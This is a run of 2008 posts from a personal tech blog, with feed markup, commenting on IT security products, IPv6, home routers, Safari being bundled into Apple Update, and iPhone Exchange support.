http://www.greghughes.net/rant/CommentView,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=dd9f2147-3af4-4c3d-8625-67df9065920f http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,dd9f2147-3af4-4c3d-8625-67df9065920f.aspx http://www.greghughes.net/rant/CommentView,guid,dd9f2147-3af4-4c3d-8625-67df9065920f.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=dd9f2147-3af4-4c3d-8625-67df9065920f 1

I know this isn't exactly a new thing, but as I was installing the IE8 Beta 1 for x64 architecture on a computer today to do some testing, I felt a warm-fuzzy sense of appreciation for the fact that more and more we are seeing software that checks for patches and updates before installing and running for the first time. It makes for more-secure system, which is nothing but good.

image

No matter what you think of Internet Explorer (and for the record/what it's worth, I like it quite a bit these days), you have to admit the safer installation process is a great improvement.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Installers that patch their software before first run - Smart security move http://www.greghughes.net/rant/PermaLink,guid,dd9f2147-3af4-4c3d-8625-67df9065920f.aspx http://www.greghughes.net/rant/InstallersThatPatchTheirSoftwareBeforeFirstRunSmartSecurityMove.aspx Wed, 16 Jul 2008 00:58:44 GMT <p> I know this isn't exactly a new thing, but as I was installing the IE8 Beta 1 for x64 architecture on a computer today to do some testing, I felt a warm-fuzzy sense of appreciation for the fact that more and more we are seeing software that checks for patches and updates before installing and running for the first time. It makes for more-secure system, which is nothing but good. </p> <p align="center"> <a href="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/Installersthatpatchtheirsoftwarebeforefi_FCCD/image_2.png"><img style="border-right: 0px; border-top: 0px; margin: 10px 0px 10px 15px; border-left: 0px; border-bottom: 0px" height="375" alt="image" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/Installersthatpatchtheirsoftwarebeforefi_FCCD/image_thumb.png" width="504" border="0"></a> </p> <p align="left"> No matter what you think of Internet Explorer (and for the record/what it's worth, I like it quite a bit these days), you have to admit the safer installation process is a great improvement. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,dd9f2147-3af4-4c3d-8625-67df9065920f.aspx IT Security Safe Computing Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=e05d4eef-03bc-46eb-91a8-62c3b966c245 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,e05d4eef-03bc-46eb-91a8-62c3b966c245.aspx http://www.greghughes.net/rant/CommentView,guid,e05d4eef-03bc-46eb-91a8-62c3b966c245.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=e05d4eef-03bc-46eb-91a8-62c3b966c245

You have firewalls and anti-malware system, video surveillance and monitoring systems for network traffic to and from the Internet. But look at eWeek's semi-smart list of the top ten infosec risks workers pose to your business today, and you may need to rethink your plans.

I call this a "semi-smart" list because it's practical and real-world, and doesn't assume the "standards" out there cover all the bases. But, at the same time it doesn't offer much in the way of solutions, which always frustrates me (and it misses some key points, especially related to intentional worker behavior, as opposed to neglect, and how it can substantially enhance the potential associated with these risks).

Point is, each of the items pointed out is very much worth considering and reviewing in your business security program. Just don't forget to look at them in the big-picture perspective of the business.

And now for the list:

  • USB Flash Drives
  • Laptops
  • P2P
  • Web Mail
  • Wi-Fi
  • Smart Phones
  • Collaboration Tools
  • Social Networks
  • Unauthorized Software Updates
  • Virtual Worlds

Pretty much every modern technical productivity enhancer. Before anyone starts screaming the alarmist song, think about not only how these things can be used for good, but also about how they could be used to to Very Bad Things.

How many of those technologies are specifically and can be proven effectively covered under your infosec policies? How many have you tested in the real world to see what your compliance profile really looks like? Could you meaningfully test for these threats, even if they were on your plan?

You can check out the eWeek article here.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Make you think: Top 10 modern business information security risks http://www.greghughes.net/rant/PermaLink,guid,e05d4eef-03bc-46eb-91a8-62c3b966c245.aspx http://www.greghughes.net/rant/MakeYouThinkTop10ModernBusinessInformationSecurityRisks.aspx Thu, 03 Jul 2008 06:09:37 GMT <p style="clear: both"> You have firewalls and anti-malware system, video surveillance and monitoring systems for network traffic to and from the Internet. But <a href="http://www.eweek.com/c/a/Security/10-Ways-Your-Employees-Pose-a-Security-Risk-for-Your-Organization/" target="_blank">look at eWeek's semi-smart list</a> of the top ten infosec risks workers pose to your business today, and you may need to rethink your plans.<br /> </p> <p style="clear: both"> I call this a "semi-smart" list because it's practical and real-world, and doesn't assume the "standards" out there cover all the bases. But, at the same time it doesn't offer much in the way of solutions, which always frustrates me (and it misses some key points, especially related to intentional worker behavior, as opposed to neglect, and how it can substantially enhance the potential associated with these risks).<br /> </p> <p style="clear: both"> Point is, each of the items pointed out is very much worth considering and reviewing in your business security program. Just don't forget to look at them in the big-picture perspective of the business. <br /> </p> <p style="clear: both"> And now for the list: </p> <p style="clear: both"> <p style="clear: both"> <ul> <li> USB Flash Drives</li> <li> Laptops</li> <li> P2P</li> <li> Web Mail</li> <li> Wi-Fi</li> <li> Smart Phones</li> <li> Collaboration Tools</li> <li> Social Networks</li> <li> Unauthorized Software Updates</li> <li> Virtual Worlds</li> </ul> > <p style="clear: both"> Pretty much every modern technical productivity enhancer. Before anyone starts screaming the alarmist song, think about not only how these things can be used for good, but also about how they could be used to to Very Bad Things.<br /> </p> <p style="clear: both"> How many of those technologies are specifically and can be proven effectively covered under your infosec policies? How many have you tested in the real world to see what your compliance profile really looks like? Could you meaningfully test for these threats, even if they <i>were</i> on your plan? </p> <p style="clear: both"> You can <a href="http://www.eweek.com/c/a/Security/10-Ways-Your-Employees-Pose-a-Security-Risk-for-Your-Organization/" target="_blank">check out the eWeek article here</a>. </p> > <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,e05d4eef-03bc-46eb-91a8-62c3b966c245.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=91ac52a5-87a5-4eee-8d41-6435a4873ed9 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,91ac52a5-87a5-4eee-8d41-6435a4873ed9.aspx http://www.greghughes.net/rant/CommentView,guid,91ac52a5-87a5-4eee-8d41-6435a4873ed9.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=91ac52a5-87a5-4eee-8d41-6435a4873ed9 2 Would you trust Twitter to handle money payments? http://www.greghughes.net/rant/PermaLink,guid,91ac52a5-87a5-4eee-8d41-6435a4873ed9.aspx http://www.greghughes.net/rant/WouldYouTrustTwitterToHandleMoneyPayments.aspx Tue, 01 Jul 2008 06:06:18 GMT <p style="clear: both"> Nate Westheimer of The Silicon Alley Insider has this to say: </p> <blockquote><i>Twitter should take full advantage of their messaging platform, user base and user disposition to lead in the P2P mobile payments space, where, despite years of hype, no one has much of a head start.</i></blockquote> <p style="clear: both"> Link to the article: <a href="http://www.alleyinsider.com/2008/6/how-twitter-will-be-worth-a-billion-in-a-year" target="_blank">How Twitter Could Be Worth A Billion In A Year</a> <br class="final-breakstyle=" clear:="" both'=""> </p> <p style="clear: both"> I have to admit, coming from the Internet financial services space, the thought of this actually happening scares me slightly, given the serious lack of stability and the manner in which changes have been made at Twitter with less than complete communication. But at any rate, they have a lot of money to throw at the problems, so I am rooting for them to get things right. It just hurts. :)<br /> </p> <p style="clear: both"> Westheimer makes some good points. Twitter is carrier/provider-agnostic and has amazingly terrific user and market penetration. Just as I send you a direct message today by typing "d yourname hi how are you?" I could pay you using syntax like "p yourname $20."<br /> </p> <p style="clear: both"> But getting from here to there is an whole other story. It's far from trivial to create a financial transaction and accounting system, especially one that scales to the sizes required (but it certainly can be done). <br /> </p> <p style="clear: both"> It's an appealing and interesting idea and one that warrant some real thought. As someone who comes from the the online banking software, infrastructure and security world, I can see the market need as well as the challenges from many fronts that will face any company that finally jumps fully on-board the micro-payments and mobile-payments train. A number of good, well-funded companies have given it a run before with limited success. It's a complex problem to solve, but it's doable. </p> <p style="clear: both"> It sure sounds like a fun challenge, and there's a massive marketplace out there just waiting for someone to get it right. Note the operative verbiage there - Doing it well is critical to success. The fact is there's no room for "scale later" in this game.<br /> </p> <p style="clear: both"> What do you think? Would you pay people via Twitter if you could? Would it be useful to you? </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,91ac52a5-87a5-4eee-8d41-6435a4873ed9.aspx IT Security Mobile Tech http://www.greghughes.net/rant/Trackback.aspx?guid=60f8af55-a467-4c29-a932-2cce65faffc7 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,60f8af55-a467-4c29-a932-2cce65faffc7.aspx http://www.greghughes.net/rant/CommentView,guid,60f8af55-a467-4c29-a932-2cce65faffc7.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=60f8af55-a467-4c29-a932-2cce65faffc7 2 Last month, Microsoft released the Microsoft Forefront Integration Kit for Network Access Protection, a solution accelerator that enables their Forefront Client Security products to interoperate with the Network Access Protection (NAP) capabilities included in Windows Server 2008. In a nutshell, it allows an integrated system of policy compliance and real-time checking of the status of a computer's Forefront security status, as well as remediation and access protection for machines that fall or are found to be out of compliance.

Using the technologies together, administrators can leverage the state of a client computer as part of the information and policy status that NAP leverages in controlling access to the network.
You can use the Kit to help protect your network infrastructure by configuring a Forefront Client Security compliance health policy across your network, monitoring the operational health of Forefront Client Security in real time, and remediating problems that arise.
More and better in-depth defense mechanisms, and ones that work well together on top of that, are good to see coming out of Microsoft and others. It's the kind of progress that's needed to stay on top of quickly evolving threats, and to proactively keep them from spreading.

(via Dan Griffin)



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Forefront Security + NAP Delivers a More-Complete Network Security Picture http://www.greghughes.net/rant/PermaLink,guid,60f8af55-a467-4c29-a932-2cce65faffc7.aspx http://www.greghughes.net/rant/ForefrontSecurityNAPDeliversAMoreCompleteNetworkSecurityPicture.aspx Tue, 10 Jun 2008 19:40:24 GMT Last month, Microsoft <a href="http://technet.microsoft.com/en-us/library/cc512112.aspx">released the Microsoft Forefront Integration Kit for Network Access Protection</a>, a solution accelerator that enables their Forefront Client Security products to interoperate with the Network Access Protection (NAP) capabilities included in Windows Server 2008. In a nutshell, it allows an integrated system of policy compliance and real-time checking of the status of a computer's Forefront security status, as well as remediation and access protection for machines that fall or are found to be out of compliance.<br> <br> Using the technologies together, administrators can leverage the state of a client computer as part of the information and policy status that NAP leverages in controlling access to the network.<br> <blockquote><i>You can use the Kit to help protect your network infrastructure by configuring a Forefront Client Security compliance health policy across your network, monitoring the operational health of Forefront Client Security in real time, and remediating problems that arise.</i> <br> </blockquote>More and better in-depth defense mechanisms, and ones that work well together on top of that, are good to see coming out of Microsoft and others. It's the kind of progress that's needed to stay on top of quickly evolving threats, and to proactively keep them from spreading.<br> <br> (via <a href="http://www.jwsecure.com/dan/2008/06/04/forefrontnap-solution-is-now-live/">Dan Griffin</a>)<br> <p> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,60f8af55-a467-4c29-a932-2cce65faffc7.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=4b99ccc2-8b03-4b01-b803-52335a2f63ec http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,4b99ccc2-8b03-4b01-b803-52335a2f63ec.aspx http://www.greghughes.net/rant/CommentView,guid,4b99ccc2-8b03-4b01-b803-52335a2f63ec.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=4b99ccc2-8b03-4b01-b803-52335a2f63ec 7

I'm pulling my hair out (what I have left, anyhow) trying to find a good home/home office wireless router that includes all the features I need. Granted, I'm a bit of a power user, but I'm honestly a bit surprised I can't find what I want out there somewhere. You'd think someone would build it. My list of features and performance requirements includes:

  • Gigabit WAN and LAN ports - and needs to have four LAN ports
  • VPN capability that I can use cross-platform - an SSL VPN might be the best option, but whatever works well and lets me connect with Windows, Mac, etc. is what really matters to me
  • Working, reliable and effective QOS - routers I have used in the past have either been terrible or mediocre at properly shaping and allocating traffic for VoIP and other services
  • Reliable and full-featured administrative capabilities in firmware
  • Quiet, reliable hardware
  • IPv6 support
  • Wireless-N

Until recently, I have been using a D-Link DIR-625 router, which has been stable and reliable. But it's a 100-megabit device and the QOS is marginal for VoIP traffic in my experience. Plus the firmware has not been updated recently and there is no VPN capability. It's rock-solid at what it does, though. I've only had to reset it a couple times since I have had it.

I've looked at the D-Link DIR-655 router, which is their currently-touted gigabit version of the 625 model. It's still on my list possible solutions, but with no VPN it doesn't meet all my needs, and D-Link doesn't seem to have one that includes all the features.

Yesterday I picked up a VPN router with gigabit and QOS made by Linksys, the WRVS4400N. It's not cheap and honestly I'm not sure why I allowed myself to buy a Linksys product after all the headaches I have had with them before. The net result of the past 12 hours of use is that I'm going to return it today. Between the slow reboots required with every other change I make and the lack of capabilities in the software (and some stuff that just doesn't work), it's already frustrating me. D-Link has seriously spoiled me in the Admin interface/firmware capabilities department, even without releasing any updates. Add to that the high-pitched whine the Linksys router makes and the heat it generates when plugged in and there's just no way. The whine is pretty awful, and gives me a serious headache within minutes if I am near it. Back to the store it goes.

So, I am left without a solution that meets all my needs. I may just have to pick up the D-Link DIR-655 and live without VPN and then find a separate VPN solution, but I don't want to if I don't have to. Any ideas anyone? Is there an option out there that will meet my needs and expectations?



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. I have a dream: The perfect gigabit wireless router with VPN and QOS http://www.greghughes.net/rant/PermaLink,guid,4b99ccc2-8b03-4b01-b803-52335a2f63ec.aspx http://www.greghughes.net/rant/IHaveADreamThePerfectGigabitWirelessRouterWithVPNAndQOS.aspx Sat, 26 Apr 2008 21:36:17 GMT <p> I'm pulling my hair out (what I have left, anyhow) trying to find a good home/home office wireless router that includes all the features I need. Granted, I'm a bit of a power user, but I'm honestly a bit surprised I can't find what I want out there <em>somewhere</em>. You'd think someone would build it. My list of features and performance requirements includes: </p> <ul> <li> Gigabit WAN and LAN ports - and needs to have four LAN ports </li> <li> VPN capability that I can use cross-platform - an SSL VPN might be the best option, but whatever works well and lets me connect with Windows, Mac, etc. is what really matters to me </li> <li> Working, reliable and effective QOS - routers I have used in the past have either been terrible or mediocre at properly shaping and allocating traffic for VoIP and other services </li> <li> Reliable and full-featured administrative capabilities in firmware </li> <li> Quiet, reliable hardware </li> <li> IPv6 support </li> <li> Wireless-N</li> </ul> <p> Until recently, I have been <a href="http://www.greghughes.net/rant/DLinkDIR625RangeBoosterWirelessRouter.aspx" target="_blank">using a D-Link DIR-625</a> router, which has been stable and reliable. But it's a 100-megabit device and the QOS is marginal for VoIP traffic in my experience. Plus the firmware has not been updated recently and there is no VPN capability. It's rock-solid at what it does, though. I've only had to reset it a couple times since I have had it. </p> <p> I've looked at the <a href="http://www.dlink.com/products/?pid=530" target="_blank">D-Link DIR-655</a> router, which is their currently-touted gigabit version of the 625 model. It's still on my list possible solutions, but with no VPN it doesn't meet all my needs, and D-Link doesn't seem to have one that includes all the features. </p> <p> Yesterday I picked up a VPN router with gigabit and QOS made by <a href="http://www.linksys.com/servlet/Satellite?c=L_Product_C2&amp;childpagename=US%2FLayout&amp;cid=1154659754557&amp;pagename=Linksys%2FCommon%2FVisitorWrapper" target="_blank">Linksys, the WRVS4400N</a>. It's not cheap and honestly I'm not sure why I allowed myself to buy a Linksys product after all the headaches I have had with them before. The net result of the past 12 hours of use is that I'm going to return it today. Between the slow reboots required with every other change I make and the lack of capabilities in the software (and some stuff that just doesn't work), it's already frustrating me. D-Link has seriously spoiled me in the Admin interface/firmware capabilities department, even without releasing any updates. Add to that the high-pitched whine the Linksys router makes and the heat it generates when plugged in and there's just no way. The whine is pretty awful, and gives me a serious headache within minutes if I am near it. Back to the store it goes. </p> <p> So, I am left without a solution that meets all my needs. I may just have to pick up the D-Link DIR-655 and live without VPN and then find a separate VPN solution, but I don't want to if I don't have to. Any ideas anyone? Is there an option out there that will meet my needs and expectations? </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,4b99ccc2-8b03-4b01-b803-52335a2f63ec.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=9ecb14e4-b2ef-4408-b62c-4b443268373c http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,9ecb14e4-b2ef-4408-b62c-4b443268373c.aspx http://www.greghughes.net/rant/CommentView,guid,9ecb14e4-b2ef-4408-b62c-4b443268373c.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=9ecb14e4-b2ef-4408-b62c-4b443268373c IPv6 has been around for something on the order of 15 years, yet it has yet to see widespread adoption. It was recently enabled on Internet core DNS infrastructure, and had been adopted in some network like those operated by certain mobile carriers. The current IP addressing and allocation scheme, dubbed IPv4, will eventually run out of IP addresses. There's been a sort of boy-called-wolf debate over whether we're really going to allocate the entire IPv4 address space anytime soon or not. But eventually we'll run out - some say in 2010.

Sean Siler, Program Manager responsible for IPv6, joined Richard Campbell and me for a RunAs Radio show. Sean really knows his stuff and did a terrific job of describing IPv6, comparing it to IPv4, and other useful information.

IPv6 enables a lot more than just additional addresses, though. Sean discusses what's the same, what's different and what's new (hint: IPSEC and multicasting everywhere). He also offers a great analogy to describe the enormous size of the IPv6 address space. It's mind-boggling, really.

If you don't understand or know much about IPv6, this interview is a great place to start learning, and you truly need to be doing so if you do network design or other work in your job. The change is significant, but not impossible - so go listen to the show and get learning!

Other resources:



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Fact and Myths about IPv6 - Interview with Sean Siler http://www.greghughes.net/rant/PermaLink,guid,9ecb14e4-b2ef-4408-b62c-4b443268373c.aspx http://www.greghughes.net/rant/FactAndMythsAboutIPv6InterviewWithSeanSiler.aspx Fri, 18 Apr 2008 18:06:20 GMT IPv6 has been around for something on the order of 15 years, yet it has yet to see widespread adoption. It was recently enabled on Internet core DNS infrastructure, and had been adopted in some network like those operated by certain mobile carriers. The current IP addressing and allocation scheme, dubbed IPv4, will eventually run out of IP addresses. There's been a sort of boy-called-wolf debate over whether we're really going to allocate the entire IPv4 address space anytime soon or not. But eventually we'll run out - some say in 2010.<br> <br> <a href="http://blogs.technet.com/ipv6/">Sean Siler</a>, Program Manager responsible for IPv6, joined Richard Campbell and me <a href="http://www.runasradio.com/default.aspx?showNum=53">for a RunAs Radio show</a>. Sean really knows his stuff and did a terrific job of describing IPv6, comparing it to IPv4, and other useful information.<br> <br> IPv6 enables a lot more than just additional addresses, though. Sean discusses what's the same, what's different and what's new (hint: IPSEC and multicasting everywhere). He also offers a great analogy to describe the enormous size of the IPv6 address space. It's mind-boggling, really.<br> <br> If you don't understand or know much about IPv6, this interview is a great place to start learning, and you truly need to be doing so if you do network design or other work in your job. The change is significant, but not impossible - <a href="http://www.runasradio.com/default.aspx?showNum=53">so go listen to the show and get learning</a>!<br> <br> Other resources:<br> <ul> <li> <a href="http://en.wikipedia.org/wiki/IPv6">IPv6 information on Wikipedia</a> </li> <li> <a href="http://www.microsoft.com/ipv6">IPv6 info from Microsoft</a> </li> <li> <a href="http://blogs.technet.com/ipv6/">Sean Siler's IPv6 blog</a> </li> </ul> <p> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,9ecb14e4-b2ef-4408-b62c-4b443268373c.aspx IT Security RunAs Radio Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=3518bde8-25b7-4709-b240-626c1ffee982 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,3518bde8-25b7-4709-b240-626c1ffee982.aspx http://www.greghughes.net/rant/CommentView,guid,3518bde8-25b7-4709-b240-626c1ffee982.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=3518bde8-25b7-4709-b240-626c1ffee982 2 Mark Russinovich, a Microsoft Technical Fellow, presented a very good session at the TechEd IT Forum last year on the topic of advanced eradication of malware on Windows machines. It's a great session and has some useful advanced techniques for removal. It is also a very good resource for those who want to better understand how malware infects and what some of the risks are. Lots of practical information and how-to's in this one.

Fortunately, the session was recorded and is available online for anyone who wants to see it. If viruses and malware are a part of your job or if this type of security topic is of interest to you, it's an hour and twelve minutes well-spent. I went looking for this session online hoping to find the PowerPoint and found the whole session with video and demo and everything - terrific stuff.

(Updated 4/7 - link to video fixed)



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Cleaning Malware on Windows - A lesson by Mark Russinovich http://www.greghughes.net/rant/PermaLink,guid,3518bde8-25b7-4709-b240-626c1ffee982.aspx http://www.greghughes.net/rant/CleaningMalwareOnWindowsALessonByMarkRussinovich.aspx Mon, 07 Apr 2008 06:16:56 GMT <a href="http://blogs.technet.com/markrussinovich/">Mark Russinovich</a>, a Microsoft Technical Fellow, presented a very good session at the TechEd IT Forum last year on the topic of advanced eradication of malware on Windows machines. It's a great session and has some useful advanced techniques for removal. It is also a very good resource for those who want to better understand how malware infects and what some of the risks are. Lots of practical information and how-to's in this one.<br> <br> Fortunately, <a href="http://www.microsoft.com/emea/spotlight/sessionh.aspx?videoid=359">the session was recorded and is available online</a> for anyone who wants to see it. If viruses and malware are a part of your job or if this type of security topic is of interest to you, it's an hour and twelve minutes well-spent. I went looking for this session online hoping to find the PowerPoint and found the whole session with video and demo and everything - terrific stuff.<br> <br> <i>(Updated 4/7 - link to video fixed)</i> <br> <p> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,3518bde8-25b7-4709-b240-626c1ffee982.aspx IT Security Safe Computing Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=2e5be256-2fba-40d1-815a-eb45c023f33d http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,2e5be256-2fba-40d1-815a-eb45c023f33d.aspx http://www.greghughes.net/rant/CommentView,guid,2e5be256-2fba-40d1-815a-eb45c023f33d.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=2e5be256-2fba-40d1-815a-eb45c023f33d

Got iTunes, or anything else Apple on your Windows computer? If so, when the Apple software checks for updates, you'll probably AppleUpdateSafari1see an option (which is enabled by default) to install Safari - even if you don't already have it installed  on your computer. Safari is Apple's default web browser (and actually not a bad one at that). But since people are used to seeing - well - updates when the software checks for updates, you might not realize you're installing new software.

Just making sure you're paying attention here, is all.

Sure enough, when I check for updates on my Windows machine, where Safari has never been installed, I'm presented with the option to install it...

AppleUpdateSafari2

As Tom Krazit tells us... Just un-check the box if you don't want to install Safari. Simple as that.

"It seems that at some point people became conditioned to downloading anything that shows up from an official source, like Microsoft, Apple, AOL, Yahoo, or whoever. Remember, it's your PC; spend your installation capital wisely." (link)

It's always important to pay attention to what you're clicking on. Fact is, Apple's probably counting on the fact that a significant number of people will just click without thinking - And that's indicative of a whole slew of problems, with users, companies, you name it.

For my part, I made the educated decision to install it. I actually kind of like Safari on the Mac, so I'm interested din trying it on Windows.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Safari magically installing on Windows? Just say &quot;no&quot; if you don't want it... http://www.greghughes.net/rant/PermaLink,guid,2e5be256-2fba-40d1-815a-eb45c023f33d.aspx http://www.greghughes.net/rant/SafariMagicallyInstallingOnWindowsJustSayQuotnoquotIfYouDontWantIt.aspx Fri, 21 Mar 2008 20:47:04 GMT <p> Got iTunes, or anything else Apple on your Windows computer? If so, when the Apple software checks for updates, you'll probably <a href="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari1_2.jpg"><img style="border: 0px none ; margin: 10px 0px 10px 15px;" alt="AppleUpdateSafari1" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari1_thumb.jpg" align="right" border="0" height="76" width="186"></a>see an option (which is enabled by default) to install Safari - even if you don't already have it installed&nbsp; on your computer. Safari is Apple's default web browser (and actually not a bad one at that). But since people are used to seeing - well - updates when the software checks for updates, you might not realize you're installing new software. </p> <p> Just making sure you're paying attention here, is all. </p> <p> Sure enough, when I check for updates on my Windows machine, where Safari has never been installed, I'm presented with the option to install it... </p> <p> <a href="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari2_2.jpg"><img style="border: 0px none ; margin: 10px 0px 10px 15px;" alt="AppleUpdateSafari2" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari2_thumb.jpg" border="0" height="484" width="378"></a> </p> <p> As Tom Krazit tells us... Just <a href="http://www.news.com/8301-13579_3-9900727-37.html" target="_blank">un-check the box</a> if you don't want to install Safari. Simple as that. </p> <blockquote> <p> <em>"It seems that at some point people became conditioned to downloading anything that shows up from an official source, like Microsoft, Apple, AOL, Yahoo, or whoever. Remember, it's your PC; spend your installation capital wisely." (<a href="http://www.news.com/8301-13579_3-9900727-37.html" target="_blank">link</a>)</em> </p> </blockquote> <p> It's always important to pay attention to what you're clicking on. Fact is, Apple's probably counting on the fact that a significant number of people will just click without thinking - And that's indicative of a whole slew of problems, with users, companies, you name it. </p> <p> For my part, I made the educated decision to install it. I actually kind of like Safari on the Mac, so I'm interested din trying it on Windows. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,2e5be256-2fba-40d1-815a-eb45c023f33d.aspx Apple IT Security Tech Things that Suck
http://www.greghughes.net/rant/Trackback.aspx?guid=af212632-177f-491c-a08e-d75626c70435 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,af212632-177f-491c-a08e-d75626c70435.aspx http://www.greghughes.net/rant/CommentView,guid,af212632-177f-491c-a08e-d75626c70435.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=af212632-177f-491c-a08e-d75626c70435

Microsoft and Apple have announced that they are working together to  make Exchange Server and the iPhone mobile phone work well together. Apple will license Exchange ActiveSync for use on the iPhone, which will in Turn help assure the Exchange Server dominance in the marketplace stays they way it is. It's really as simple as that.

The fact is that Exchange is a pretty terrific server product for email, calendaring and a lot more. The iPhone is a pretty terrific mobile device. They don't integrate too terribly well today: You can sync your calendar and contacts via the USB connection to your computer, and you can get IMAP email from a properly-configured Exchange server (which works, but is not exactly optimal). But it's far from simple, far from seamless, and far from supportable in the enterprise.

One has to wonder what this means, either directly or indirectly, for the Windows Mobile world. I know the arguments: Different markets, different platforms, different purposes, etc. etc. etc... but with the iPhone SDK availability, that gap will be much narrower. And the fact of the matter is, Apple has the usability nailed with the iPhone. Sure, there's a few enhancements needed. But those are ones that can (and I'm certain will) be done.

ActiveSync will provide the ability (assuming Apple leverages all the features) to do push email, calendar and contact sync over the air, and task list sync.

Perhaps one of the more important potential benefits from ActiveSync integration with the iPhone is the ability to get enterprise-class security on the device, which to date is lacking and doesn't meet the needs or standards of most commercial IT departments. Exchange 2007 clients can be set up for enforced enterprise IT "policies" or controls, which would go a long way toward satisfying the security needs. In my mind, that's the biggest potential win. Without that, pushing email and syncing calendars and contacts is to risky an activity.

From Apple's press release come details of what they intend to provide - and it looks liek Cisco VPNs are in the package, as well:

Apple has licensed Exchange ActiveSync from Microsoft and is building it right into the iPhone, so that iPhone will connect out-of-the-box to Microsoft Exchange Servers 2003 and 2007 for secure over-the-air push email, contacts, calendars and global address lists. Built-in Exchange ActiveSync support also enables security features such as remote wipe, password policies and auto-discovery. The iPhone 2.0 software supports Cisco IPsec VPN to ensure the highest level of IP-based encryption available for transmission of sensitive corporate data, as well as the ability to authenticate using digital certificates or password-based, multi-factor authentication. The addition of WPA2 Enterprise with 802.1x authentication enables enterprise customers to deploy iPhone and iPod touch with the latest standards for protection of Wi-Fi networks.

The iPhone 2.0 software provides a configuration utility that allows IT administrators to easily and quickly set up many iPhones, including password policies, VPN setting, installing certificates, email server settings and more. Once the configuration is defined it can be easily and securely delivered via web link or email to the user. To install, all the user has to do is authenticate with a user ID or password, download the configuration and tap install. Once installed, the user will have access to all their corporate IT services.

Good move Apple. Good move Microsoft. Looking forward to this one!



